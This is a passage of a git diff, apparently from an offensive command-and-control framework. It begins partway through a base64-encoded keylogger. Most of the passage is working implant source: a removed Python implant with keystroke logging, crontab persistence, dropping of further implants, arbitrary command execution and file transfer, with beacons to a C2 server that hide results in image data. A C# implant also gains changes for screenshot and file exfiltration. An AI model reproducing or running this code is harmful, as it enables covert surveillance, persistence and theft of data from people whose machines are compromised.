lDQWdhV1lnS0NoaWVYUmxjMXRyUGo0elhTNXZjbVFnUGo0Z0tHc21OeWtwSUNZZ01TQStJREFwRFFvZ0lDQWdJQ0JwWmlCdWIzUWdjSEpsZGw5a2IzZHVXMnRkRFFvZ0lDQWdJQ0FnSUdOaGMyVWdhdzBLSUNBZ0lDQWdJQ0FnSUhkb1pXNGdNellOQ2lBZ0lDQWdJQ0FnSUNBZ0lHTjBjbXhqYUdGeUlEMGdJbHRsYm5SbGNsMGlEUW9nSUNBZ0lDQWdJQ0FnZDJobGJpQTBPQTBLSUNBZ0lDQWdJQ0FnSUNBZ1kzUnliR05vWVhJZ1BTQWlXM1JoWWwwaURRb2dJQ0FnSUNBZ0lDQWdkMmhsYmlBME9RMEtJQ0FnSUNBZ0lDQWdJQ0FnWTNSeWJHTm9ZWElnUFNBaUlDSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVXhEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJaR1ZzWlhSbFhTSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVXpEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJaWE5qWFNJTkNpQWdJQ0FnSUNBZ0lDQjNhR1Z1SURVMURRb2dJQ0FnSUNBZ0lDQWdJQ0JqZEhKc1kyaGhjaUE5SUNKYlkyMWtYU0lOQ2lBZ0lDQWdJQ0FnSUNCM2FHVnVJRFUyRFFvZ0lDQWdJQ0FnSUNBZ0lDQmpkSEpzWTJoaGNpQTlJQ0piYzJocFpuUmRJZzBLSUNBZ0lDQWdJQ0FnSUhkb1pXNGdOVGNOQ2lBZ0lDQWdJQ0FnSUNBZ0lHTjBjbXhqYUdGeUlEMGdJbHRqWVhCelhTSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVTREUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJiM0IwYVc5dVhTSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVTVEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJZM1J5YkYwaURRb2dJQ0FnSUNBZ0lDQWdkMmhsYmlBMk13MEtJQ0FnSUNBZ0lDQWdJQ0FnWTNSeWJHTm9ZWElnUFNBaVcyWnVYU0lOQ2lBZ0lDQWdJQ0FnSUNCbGJITmxEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSWlEUW9nSUNBZ0lDQWdJR1Z1WkEwS0lDQWdJQ0FnSUNCcFppQmpkSEpzWTJoaGNpQTlQU0FpSWlCaGJtUWdZWE5qYVdrZ1BUMGdNQTBLSUNBZ0lDQWdJQ0FnSUd0amFISWdQU0JEWVhKaWIyNHVSMlYwVTJOeWFYQjBWbUZ5YVdGaWJHVW9VMDFmUzBOSVVsOURRVU5JUlN3Z1UwMWZRMVZTVWtWT1ZGOVRRMUpKVUZRcERRb2dJQ0FnSUNBZ0lDQWdZM1Z5Y2w5aGMyTnBhU0E5SUVOaGNtSnZiaTVMWlhsVWNtRnVjMnhoZEdVb2EyTm9jaXdnYXl3Z2MzUmhkR1VwRFFvZ0lDQWdJQ0FnSUNBZ1kzVnljbDloYzJOcGFTQTlJR04xY25KZllYTmphV2tnUGo0Z01UWWdhV1lnWTNWeWNsOWhjMk5wYVNBOElERU5DaUFnSUNBZ0lDQWdJQ0J3Y21WMlgyUnZkMjViYTEwZ1BTQjBjblZsRFFvZ0lDQWdJQ0FnSUNBZ2FXWWdZM1Z5Y2w5aGMyTnBhU0E5UFNBd0RRb2dJQ0FnSUNBZ0lDQWdJQ0JqWVhCZlpteGhaeUE5SUhSeWRXVU5DaUFnSUNBZ0lDQWdJQ0JsYkhObERRb2dJQ0FnSUNBZ0lDQWdJQ0JoYzJOcGFTQTlJR04xY25KZllYTmphV2tOQ2lBZ0lDQWdJQ0FnSUNCbGJtUU5DaUFnSUNBZ0lDQWdaV3h6YVdZZ1kzUnliR05vWVhJZ0lUMGdJaUlOQ2lBZ0lDQWdJQ0FnSUNCd2NtVjJYMlJ2ZDI1YmExMGdQU0IwY25WbERRb2dJQ0FnSUNBZ0lHVnVaQTBLSUNBZ0lDQWdaVzVrRFFvZ0lDQWdaV3h6WlEwS0lDQWdJQ0FnY0hKbGRsOWtiM2R1VzJ0ZElEMGdabUZzYzJVTkNpQWdJQ0JsYm1RTkNpQWdaVzVrRFFvZ0lHbG1JR0Z6WTJscElDRTlJREFnYjNJZ1kzUnliR05vWVhJZ0lUMGdJaUlOQ2lBZ0lDQnBaaUJoY0hCZmJtRnRaU0FoUFNCc1lYTjBWMmx1Wkc5M0RRb2dJQ0FnSUNCd2RYUnpJQ0pjYmx4dVd5TjdZWEJ3WDI1aGJXVjlYU0F0SUZzamUxUnBiV1V1Ym05M2ZWMWNiaUlOQ2lBZ0lDQWdJR3hoYzNSWGFXNWtiM2NnUFNCaGNIQmZibUZ0WlEwS0lDQWdJR1Z1WkEwS0lDQWdJR2xtSUdOMGNteGphR0Z5SUNFOUlDSWlEUW9nSUNBZ0lDQndjbWx1ZENBaUkzdGpkSEpzWTJoaGNuMGlEUW9nSUNBZ1pXeHphV1lnWVhOamFXa2dQaUF6TWlCaGJtUWdZWE5qYVdrZ1BDQXhNamNOQ2lBZ0lDQWdJR01nUFNCcFppQmpZWEJmWm14aFp5QjBhR1Z1SUdGelkybHBMbU5vY2k1MWNHTmhjMlVnWld4elpTQmhjMk5wYVM1amFISWdaVzVrRFFvZ0lDQWdJQ0J3Y21sdWRDQWlJM3RqZlNJTkNpQWdJQ0JsYkhObERRb2dJQ0FnSUNCd2NtbHVkQ0FpV3lON1lYTmphV2w5WFNJTkNpQWdJQ0JsYm1RTkNpQWdJQ0FrYzNSa2IzVjBMbVpzZFhOb0RRb2dJR1Z1WkEwS0lDQkxaWEp1Wld3dWMyeGxaWEFvTUM0d01Ta05DbVZ1WkEwS0RRbz1cJykpIiB8IHJ1YnkgPiAlcyAyPiYxICYnICUgZmlsZW5hbWUpLnJlYWQoKQp0aW1lLnNsZWVwKDEpCg==" + modb64logger = base64.b64decode(b64logger) + modpayload = modb64logger.replace("REPLACEME",filename) + exec(modpayload) + pids = os.popen('ps aux | grep " ruby" | grep -v grep').read() + returnval = "%%s \\r\\nKeylogger started here: %%s" %% (pids, filename) + return returnval + +def dfile(fname): + if fname: + with open(fname, "rb") as image_file: + imgbytes = image_file.read() + return "0000100001" + imgbytes + +def ufile(base64file, fname): + fname = fname.replace('"','') + filebytes = base64.b64decode(base64file) + try: + output_file = open(fname, 'w') + output_file.write(filebytes) + output_file.close() + return "Uploaded file %%s" %% fname + except Exception as e: + return "Error with source file: %%s" %% e + +def sai(delfile=False): + import uuid + filename = "/tmp/%%s.sh" %% (uuid.uuid4().hex) + imfull = base64.b64decode(imbase) + output_file = open(filename, 'w') + output_file.write(imfull) + output_file.close() + import subprocess + returnval = "Ran Start Another Implant - File dropped: %%s" %% filename + p = subprocess.Popen(["sh", filename]) + if delfile: + p = subprocess.Popen(["rm", filename]) + returnval = "Ran Start Another Implant - File removed: %%s" %% filename + return returnval + +def persist(): + import uuid, os + dircontent = "%%s/.%%s" %% (os.environ['HOME'], uuid.uuid4().hex) + os.mkdir(dircontent) + filename = "%%s/%%s_psh.sh" %% (dircontent, uuid.uuid4().hex) + imfull = base64.b64decode(imbase) + output_file = open(filename, 'w') + output_file.write(imfull) + output_file.close() + import subprocess as s + s.call("crontab -l | { cat; echo '* 10 * * * sh %%s'; } | crontab -" %% filename, shell=True) + return "Installing persistence via user crontab everyday at 10am: \\r\\n%%s" %% filename + +def remove_persist(): + import subprocess as s + s.call("crontab -l | { cat; } | grep -v '_psh.sh'| crontab -", shell=True) + return "Removed user persistence via crontab: \\r\\n**must delete files manually**" + +def decrypt_bytes_gzip( key, data): + iv = data[0:16] + aes = get_encryption(key, iv) + data = aes.decrypt( data ) + import StringIO + import gzip + infile = StringIO.StringIO(data[16:]) + with gzip.GzipFile(fileobj=infile, mode="r") as f: + data = f.read() + return data + +while(True): + cstr=time.strftime("%%d/%%m/%%Y",time.gmtime());cstr=time.strptime(cstr,"%%d/%%m/%%Y") + if cstr < kd: + key = "%s" + uri = "%s" + server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri) + try: + time.sleep(timer) + ua='%s' + if hh: req=urllib2.Request(server,headers={'Host':hh,'User-agent':ua}) + else: req=urllib2.Request(server,headers={'User-agent':ua}) + res=urllib2.urlopen(req); + html = res.read() + except Exception as e: + E = e + #print "error %%s" %% e + #print html + if html: + try: + returncmd = decrypt( key, html ) + returncmd = returncmd.rstrip('\\0') + + if "multicmd" in returncmd: + + returncmd = returncmd.replace("multicmd","") + returnval = "" + splits = returncmd.split("!d-3dion@LD!-d") + + for split in splits: + taskId = split[:5].strip().strip('\x00') + cmd = split[5:].strip().strip('\x00') + if cmd[:10] == "$sleeptime": + timer = int(cmd.replace("$sleeptime = ","")) + elif cmd[:13] == "download-file": + fname = cmd.replace("download-file ","") + returnval = dfile(fname) + elif cmd[:11] == "upload-file": + fullparams = cmd.replace("upload-file ","") + params = fullparams.split(":") + returnval = ufile(params[1],params[0]) + elif cmd[:19] == "install-persistence": + returnval = persist() + elif cmd[:14] == "get-keystrokes": + returnval = keylog() + elif cmd[:18] == "remove-persistence": + returnval = remove_persist() + elif cmd[:19] == "startanotherimplant": + returnval = sai(delfile=True) + elif cmd[:28] == "startanotherimplant-keepfile": + returnval = sai() + elif cmd[:10] == "loadmodule": + module = cmd.replace("loadmodule","") + exec(module) + try: + import sys + import StringIO + import contextlib + + @contextlib.contextmanager + def stdoutIO(stdout=None): + old = sys.stdout + if stdout is None: + stdout = StringIO.StringIO() + sys.stdout = stdout + yield stdout + sys.stdout = old + + with stdoutIO() as s: + exec module + if s.getvalue(): + returnval = s.getvalue() + else: + returnval = "Module loaded" + except Exception as e: + returnval = "Error with source file: %%s" %% e + + elif cmd.startswith("linuxprivchecker"): + args = cmd[len('linuxprivchecker'):].strip() + args = args.split() + pycode_index = args.index('-pycode') + encoded_module = args[pycode_index +1] + args.pop(pycode_index) + args.pop(pycode_index) + pycode = base64.b64decode(encoded_module) + process = ['python', '-c', pycode] + pycode = 'import sys; sys.argv = sys.argv[1:];' + pycode + import subprocess + returnval = subprocess.check_output(['python', '-c', pycode] + args) + + elif cmd[:6] == "python": + module = cmd.replace("python ","") + try: + import sys + import StringIO + import contextlib + + @contextlib.contextmanager + def stdoutIO(stdout=None): + old = sys.stdout + if stdout is None: + stdout = StringIO.StringIO() + sys.stdout = stdout + yield stdout + sys.stdout = old + + with stdoutIO() as s: + exec module + + returnval = s.getvalue() + + except Exception as e: + returnval = "Error with source file: %%s" %% e + + else: + try: + returnval = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True) + except subprocess.CalledProcessError as exc: + returnval = "ErrorCmd: %%s" %% exc.output + + server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri) + opener = urllib2.build_opener() + postcookie = encrypt(key, taskId) + data = base64.b64decode(random.choice(icoimage)) + dataimage = data.ljust( 1500, '\x00' ) + dataimagebytes = dataimage+(encrypt(key, returnval, gzip=True)) + if hh: req=urllib2.Request(server,dataimagebytes,headers={'Host':hh,'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie}) + else: req=urllib2.Request(server,dataimagebytes,headers={'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie}) + res=urllib2.urlopen(req); + response = res.read() + + except Exception as e: + E = e + # print "error %%s" %% e \ No newline at end of file diff --git a/Files/Sharp.cs b/Files/Sharp.cs index 3718a8d..f871eb6 100644 --- a/Files/Sharp.cs +++ b/Files/Sharp.cs @@ -376,51 +376,53 @@ public class Program var split = splitcmd.Split(new string[] { "!d-3dion@LD!-d" }, StringSplitOptions.RemoveEmptyEntries); foreach (string c in split) { - tasksrc = c; - if (c.ToLower().StartsWith("exit")) + var taskId = c.Substring(0, 5); + cmd = c.Substring(5, c.Length - 5); + tasksrc = cmd; + if (cmd.ToLower().StartsWith("exit")) { exitvt.Set(); break; } - else if (c.ToLower().StartsWith("loadmodule")) + else if (cmd.ToLower().StartsWith("loadmodule")) { - var module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase); + var module = Regex.Replace(cmd, "loadmodule", "", RegexOptions.IgnoreCase); var assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module)); output.AppendLine("Module loaded sucessfully"); - tasksrc = "Module loaded sucessfully"; } - else if (c.ToLower().StartsWith("upload-file")) + else if (cmd.ToLower().StartsWith("upload-file")) { - var path = Regex.Replace(c, "upload-file", "", RegexOptions.IgnoreCase); + var path = Regex.Replace(cmd, "upload-file", "", RegexOptions.IgnoreCase); var splitargs = path.Split(new string[] { ";" }, StringSplitOptions.RemoveEmptyEntries); Console.WriteLine("Uploaded file to: " + splitargs[1]); var fileBytes = Convert.FromBase64String(splitargs[0]); System.IO.File.WriteAllBytes(splitargs[1].Replace("\"", ""), fileBytes); tasksrc = "Uploaded file sucessfully"; } - else if (c.ToLower().StartsWith("download-file")) + else if (cmd.ToLower().StartsWith("download-file")) { - var path = Regex.Replace(c, "download-file ", "", RegexOptions.IgnoreCase); + var path = Regex.Replace(cmd, "download-file ", "", RegexOptions.IgnoreCase); var file = File.ReadAllBytes(path.Replace("\"", "")); var fileChuck = Combine(Encoding.ASCII.GetBytes("0000100001"), file); - var dtask = Encryption(Key, c); + var eTaskId = Encryption(Key, taskId); var dcoutput = Encryption(Key, "", true, fileChuck); var doutputBytes = System.Convert.FromBase64String(dcoutput); var dsendBytes = ImgGen.GetImgData(doutputBytes); - GetWebRequest(dtask).UploadData(UrlGen.GenerateUrl(), dsendBytes); + GetWebRequest(eTaskId).UploadData(UrlGen.GenerateUrl(), dsendBytes); + continue; } - else if (c.ToLower().StartsWith("get-screenshotmulti")) + else if (cmd.ToLower().StartsWith("get-screenshotmulti")) { bool sShot = true; int sShotCount = 1; while(sShot) { var sHot = RunAssembly("run-exe Core.Program Core get-screenshot"); - var dtask = Encryption(Key, c); + var eTaskId = Encryption(Key, taskId); var dcoutput = Encryption(Key, strOutput.ToString(), true); var doutputBytes = System.Convert.FromBase64String(dcoutput); var dsendBytes = ImgGen.GetImgData(doutputBytes); - GetWebRequest(dtask).UploadData(UrlGen.GenerateUrl(), dsendBytes); + GetWebRequest(eTaskId).UploadData(UrlGen.GenerateUrl(), dsendBytes); Thread.Sleep(240000); sShotCount++; if (sShotCount > 100) { @@ -431,21 +433,22 @@ public class Program output.Append("[+] Multi Screenshot Ran Sucessfully"); } } + continue; } - else if (c.ToLower().StartsWith("listmodules")) + else if (cmd.ToLower().StartsWith("listmodules")) { var appd = AppDomain.CurrentDomain.GetAssemblies(); output.AppendLine("[+] Modules loaded:").AppendLine(""); foreach (var ass in appd) output.AppendLine(ass.FullName.ToString()); } - else if (c.ToLower().StartsWith("run-dll") || c.ToLower().StartsWith("run-exe")) + else if (cmd.ToLower().StartsWith("run-dll") || cmd.ToLower().StartsWith("run-exe")) { - output.AppendLine(RunAssembly(c)); + output.AppendLine(RunAssembly(cmd)); } - else if (c.ToLower().StartsWith("start-process")) + else if (cmd.ToLower().StartsWith("start-process")) { - var proc = c.Replace("'", "").Replace("\"", ""); + var proc = cmd.Replace("'", "").Replace("\"", ""); var pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase); pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase); var args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase); @@ -458,7 +461,7 @@ public class Program output.AppendLine(p.StandardOutput.ReadToEnd()).AppendLine(p.StandardError.ReadToEnd()); p.WaitForExit(); } - else if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon")) + else if (cmd.ToLower().StartsWith("setbeacon") || cmd.ToLower().StartsWith("beacon")) { var bcnRgx = new Regex(@"(?<=(setbeacon|beacon)\s{1,})(?[0-9]{1,9})(?[h,m,s]{0,1})", RegexOptions.Compiled | RegexOptions.IgnoreCase); var mch = bcnRgx.Match(c); @@ -482,19 +485,19 @@ public class Program output.AppendLine(strOutput.ToString()); var sb = strOutput.GetStringBuilder(); sb.Remove(0, sb.Length); - if (tasksrc.Length > 200) + if (tasksrc.Length > 200) // This is not used? tasksrc = tasksrc.Substring(0, 199); - var task = Encryption(Key, tasksrc); + var enTaskId = Encryption(Key, taskId); var coutput = Encryption(Key, output.ToString(), true); var outputBytes = System.Convert.FromBase64String(coutput); var sendBytes = ImgGen.GetImgData(outputBytes); - GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes); + GetWebRequest(enTaskId).UploadData(UrlGen.GenerateUrl(), sendBytes); } } } catch (Exception e) { - var task = Encryption(Key, "Error"); + var task = Encryption(Key, "Error"); var eroutput = Encryption(Key, $"Error: {output.ToString()} {e}", true); var outputBytes = System.Convert.FromBase64String(eroutput); var sendBytes = ImgGen.GetImgData(outputBytes); diff --git a/HTML.py b/HTML.py index 66fb532..7dada64 100644 --- a/HTML.py +++ b/HTML.py @@ -209,8 +209,8 @@ function SearchTask() { function tweakMarkup(){ // Add classes to columns - var classes = ['id', 'taskid', 'randomuri', 'command', 'output', 'prompt','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] - //var classes = ['id', 'Label', taskid', 'randomuri', 'command', 'output', 'prompt','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] + var classes = ['id', 'taskid', 'randomuri', 'command', 'output', 'user','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] + //var classes = ['id', 'Label', taskid', 'randomuri', 'command', 'output', 'user','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] tbl = document.getElementById("PoshTable"); ths = tbl.getElementsByTagName("th"); for( i=0; i'; td.onclick = toggleHide @@ -333,7 +333,7 @@ table { table tr th.randomuri { width: 15%; } - table tr th.prompt { + table tr th.user { width: 10%; } @@ -355,7 +355,7 @@ __________ .__. _________ ________ """ - if table == "CompletedTasks": + if table == "Tasks": HTMLPre += """ @@ -372,13 +372,13 @@ __________ .__. _________ ________ frame = pd.read_sql_query("SELECT * FROM %s" % table, conn) # encode the Output column - if table == "CompletedTasks": + if table == "Tasks": for index, row in frame.iterrows(): frame.loc[index, "Command"] = replace_tabs(cgi.escape(row["Command"])) frame.loc[index, "Output"] = replace_tabs(cgi.escape(row["Output"])) # convert the random uri to original hostname - if table == "CompletedTasks": + if table == "Tasks": framelen = frame['RandomURI'].count() for x in range(0, framelen): try: @@ -404,7 +404,7 @@ __________ .__. _________ ________ HTMLPost = HTMLPost.replace("RandomURI","RandomURI") HTMLPost = HTMLPost.replace("Command","Command") HTMLPost = HTMLPost.replace("Output","Output") - HTMLPost = HTMLPost.replace("Prompt","Prompt") + HTMLPost = HTMLPost.replace("User","User") HTMLPost = HTMLPost.replace("ImplantID","ImplantID") HTMLPost = HTMLPost.replace("User","User") HTMLPost = HTMLPost.replace("Hostname","Hostname") diff --git a/Implant.py b/Implant.py index 29d58db..461dde5 100644 --- a/Implant.py +++ b/Implant.py @@ -41,516 +41,10 @@ NEWKEY8839394%s4939388YEKWEN IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Key, self.AllBeaconImages) with open("%spy_dropper.py" % (PayloadsDirectory), 'rb') as f: self.PythonImplant = base64.b64encode(f.read()) - self.PythonCore = """import urllib2, os, subprocess, re, datetime, time, base64, string, random -hh = '%s' -timer = %s -icoimage = [%s] -urls = [%s] -kd=time.strptime("%s","%%d/%%m/%%Y") -useragent = "" -imbase = "%s" - -def keylog(): - # keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/modules/python/collection/osx/keylogger.py - import os,time,base64,subprocess,uuid - filename = "/tmp/%%s" %% uuid.uuid4().hex - b64logger = "aW1wb3J0IG9zLHRpbWUKZmlsZW5hbWUgPSAiUkVQTEFDRU1FIgpvdXRwdXQgPSBvcy5wb3BlbignZWNobyAicmVxdWlyZSBcJ2Jhc2U2NFwnO2V2YWwoQmFzZTY0LmRlY29kZTY0KFwnWkdWbUlISjFZbmxmTVY4NVgyOXlYMmhwWjJobGNqOE5DaUFnVWxWQ1dWOVdSVkpUU1U5T0xuUnZYMllnUGowZ01TNDVJQ1ltSUZKVlFsbGZWa1ZTVTBsUFRpNTBiMTltUERJdU13MEtaVzVrRFFwa1pXWWdjblZpZVY4eVh6TmZiM0pmYUdsbmFHVnlQdzBLSUNCU1ZVSlpYMVpGVWxOSlQwNHVkRzlmWmlBK1BTQXlMak1OQ21WdVpBMEtjbVZ4ZFdseVpTQW5kR2h5WldGa0p3MEtjbVZ4ZFdseVpTQW5abWxrWkd4bEp5QnBaaUJ5ZFdKNVh6SmZNMTl2Y2w5b2FXZG9aWEkvRFFweVpYRjFhWEpsSUNkbWFXUmtiR1V2YVcxd2IzSjBKeUJwWmlCeWRXSjVYekpmTTE5dmNsOW9hV2RvWlhJL0RRcHlaWEYxYVhKbElDZGtiQ2NnYVdZZ2JtOTBJSEoxWW5sZk1sOHpYMjl5WDJocFoyaGxjajhOQ25KbGNYVnBjbVVnSjJSc0wybHRjRzl5ZENjZ2FXWWdibTkwSUhKMVlubGZNbDh6WDI5eVgyaHBaMmhsY2o4TkNrbHRjRzl5ZEdWeUlEMGdhV1lnWkdWbWFXNWxaRDhvUkV3Nk9rbHRjRzl5ZEdWeUtTQjBhR1Z1SUdWNGRHVnVaQ0JFVERvNlNXMXdiM0owWlhJZ1pXeHphV1lnWkdWbWFXNWxaRDhvUm1sa1pHeGxPanBKYlhCdmNuUmxjaWtnZEdobGJpQmxlSFJsYm1RZ1JtbGtaR3hsT2pwSmJYQnZjblJsY2lCbGJITmxJRVJNT2pwSmJYQnZjblJoWW14bElHVnVaQTBLWkdWbUlHMWhiR3h2WTNNb2MybDZaU2tOQ2lBZ2FXWWdjblZpZVY4eVh6TmZiM0pmYUdsbmFHVnlQdzBLSUNBZ0lFWnBaR1JzWlRvNlVHOXBiblJsY2k1dFlXeHNiMk1vYzJsNlpTa05DaUFnWld4emFXWWdjblZpZVY4eFh6bGZiM0pmYUdsbmFHVnlQeUFOQ2lBZ0lDQkVURG82UTFCMGNpNXRZV3hzYjJNb2MybDZaU2tOQ2lBZ1pXeHpaUTBLSUNBZ0lFUk1PanB0WVd4c2IyTW9jMmw2WlNrTkNpQWdaVzVrRFFwbGJtUU5DbWxtSUc1dmRDQnlkV0o1WHpGZk9WOXZjbDlvYVdkb1pYSS9EUW9nSUcxdlpIVnNaU0JFVEEwS0lDQWdJRzF2WkhWc1pTQkpiWEJ2Y25SaFlteGxEUW9nSUNBZ0lDQmtaV1lnYldWMGFHOWtYMjFwYzNOcGJtY29iV1YwYUN3Z0ttRnlaM01zSUNaaWJHOWpheWtOQ2lBZ0lDQWdJQ0FnYzNSeUlEMGdiV1YwYUM1MGIxOXpEUW9nSUNBZ0lDQWdJR3h2ZDJWeUlEMGdjM1J5V3pBc01WMHVaRzkzYm1OaGMyVWdLeUJ6ZEhKYk1TNHVMVEZkRFFvZ0lDQWdJQ0FnSUdsbUlITmxiR1l1Y21WemNHOXVaRjkwYno4Z2JHOTNaWElOQ2lBZ0lDQWdJQ0FnSUNCelpXeG1Mbk5sYm1RZ2JHOTNaWElzSUNwaGNtZHpEUW9nSUNBZ0lDQWdJR1ZzYzJVTkNpQWdJQ0FnSUNBZ0lDQnpkWEJsY2cwS0lDQWdJQ0FnSUNCbGJtUU5DaUFnSUNBZ0lHVnVaQTBLSUNBZ0lHVnVaQTBLSUNCbGJtUU5DbVZ1WkEwS1UwMWZTME5JVWw5RFFVTklSU0E5SURNNERRcFRUVjlEVlZKU1JVNVVYMU5EVWtsUVZDQTlJQzB5RFFwTlFWaGZRVkJRWDA1QlRVVWdQU0E0TUEwS2JXOWtkV3hsSUVOaGNtSnZiZzBLSUNCcFppQnlkV0o1WHpKZk0xOXZjbDlvYVdkb1pYSS9EUW9nSUNBZ1pYaDBaVzVrSUVacFpHUnNaVG82U1cxd2IzSjBaWElOQ2lBZ1pXeHpaUTBLSUNBZ0lHVjRkR1Z1WkNCRVREbzZTVzF3YjNKMFpYSU5DaUFnWlc1a0RRb2dJR1JzYkc5aFpDQW5MMU41YzNSbGJTOU1hV0p5WVhKNUwwWnlZVzFsZDI5eWEzTXZRMkZ5WW05dUxtWnlZVzFsZDI5eWF5OURZWEppYjI0bkRRb2dJR1Y0ZEdWeWJpQW5kVzV6YVdkdVpXUWdiRzl1WnlCRGIzQjVVSEp2WTJWemMwNWhiV1VvWTI5dWMzUWdVSEp2WTJWemMxTmxjbWxoYkU1MWJXSmxjaUFxTENCMmIybGtJQ29wSncwS0lDQmxlSFJsY200Z0ozWnZhV1FnUjJWMFJuSnZiblJRY205alpYTnpLRkJ5YjJObGMzTlRaWEpwWVd4T2RXMWlaWElnS2lrbkRRb2dJR1Y0ZEdWeWJpQW5kbTlwWkNCSFpYUkxaWGx6S0hadmFXUWdLaWtuRFFvZ0lHVjRkR1Z5YmlBbmRXNXphV2R1WldRZ1kyaGhjaUFxUjJWMFUyTnlhWEIwVm1GeWFXRmliR1VvYVc1MExDQnBiblFwSncwS0lDQmxlSFJsY200Z0ozVnVjMmxuYm1Wa0lHTm9ZWElnUzJWNVZISmhibk5zWVhSbEtIWnZhV1FnS2l3Z2FXNTBMQ0IyYjJsa0lDb3BKdzBLSUNCbGVIUmxjbTRnSjNWdWMybG5ibVZrSUdOb1lYSWdRMFpUZEhKcGJtZEhaWFJEVTNSeWFXNW5LSFp2YVdRZ0tpd2dkbTlwWkNBcUxDQnBiblFzSUdsdWRDa25EUW9nSUdWNGRHVnliaUFuYVc1MElFTkdVM1J5YVc1blIyVjBUR1Z1WjNSb0tIWnZhV1FnS2lrbkRRcGxibVFOQ25CemJpQTlJRzFoYkd4dlkzTW9NVFlwRFFwdVlXMWxJRDBnYldGc2JHOWpjeWd4TmlrTkNtNWhiV1ZmWTNOMGNpQTlJRzFoYkd4dlkzTW9UVUZZWDBGUVVGOU9RVTFGS1EwS2EyVjViV0Z3SUQwZ2JXRnNiRzlqY3lneE5pa05Dbk4wWVhSbElEMGdiV0ZzYkc5amN5ZzRLUTBLYVhSMlgzTjBZWEowSUQwZ1ZHbHRaUzV1YjNjdWRHOWZhUTBLY0hKbGRsOWtiM2R1SUQwZ1NHRnphQzV1Wlhjb1ptRnNjMlVwRFFwc1lYTjBWMmx1Wkc5M0lEMGdJaUlOQ25kb2FXeGxJQ2gwY25WbEtTQmtidzBLSUNCRFlYSmliMjR1UjJWMFJuSnZiblJRY205alpYTnpLSEJ6Ymk1eVpXWXBEUW9nSUVOaGNtSnZiaTVEYjNCNVVISnZZMlZ6YzA1aGJXVW9jSE51TG5KbFppd2dibUZ0WlM1eVpXWXBEUW9nSUVOaGNtSnZiaTVIWlhSTFpYbHpLR3RsZVcxaGNDa05DaUFnYzNSeVgyeGxiaUE5SUVOaGNtSnZiaTVEUmxOMGNtbHVaMGRsZEV4bGJtZDBhQ2h1WVcxbEtRMEtJQ0JqYjNCcFpXUWdQU0JEWVhKaWIyNHVRMFpUZEhKcGJtZEhaWFJEVTNSeWFXNW5LRzVoYldVc0lHNWhiV1ZmWTNOMGNpd2dUVUZZWDBGUVVGOU9RVTFGTENBd2VEQTRNREF3TVRBd0tTQStJREFOQ2lBZ1lYQndYMjVoYldVZ1BTQnBaaUJqYjNCcFpXUWdkR2hsYmlCdVlXMWxYMk56ZEhJdWRHOWZjeUJsYkhObElDZFZibXR1YjNkdUp5QmxibVFOQ2lBZ1lubDBaWE1nUFNCclpYbHRZWEF1ZEc5ZmMzUnlEUW9nSUdOaGNGOW1iR0ZuSUQwZ1ptRnNjMlVOQ2lBZ1lYTmphV2tnUFNBd0RRb2dJR04wY214amFHRnlJRDBnSWlJTkNpQWdLREF1TGk0eE1qZ3BMbVZoWTJnZ1pHOGdmR3Q4RFFvZ0lDQWdhV1lnS0NoaWVYUmxjMXRyUGo0elhTNXZjbVFnUGo0Z0tHc21OeWtwSUNZZ01TQStJREFwRFFvZ0lDQWdJQ0JwWmlCdWIzUWdjSEpsZGw5a2IzZHVXMnRkRFFvZ0lDQWdJQ0FnSUdOaGMyVWdhdzBLSUNBZ0lDQWdJQ0FnSUhkb1pXNGdNellOQ2lBZ0lDQWdJQ0FnSUNBZ0lHTjBjbXhqYUdGeUlEMGdJbHRsYm5SbGNsMGlEUW9nSUNBZ0lDQWdJQ0FnZDJobGJpQTBPQTBLSUNBZ0lDQWdJQ0FnSUNBZ1kzUnliR05vWVhJZ1BTQWlXM1JoWWwwaURRb2dJQ0FnSUNBZ0lDQWdkMmhsYmlBME9RMEtJQ0FnSUNBZ0lDQWdJQ0FnWTNSeWJHTm9ZWElnUFNBaUlDSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVXhEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJaR1ZzWlhSbFhTSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVXpEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJaWE5qWFNJTkNpQWdJQ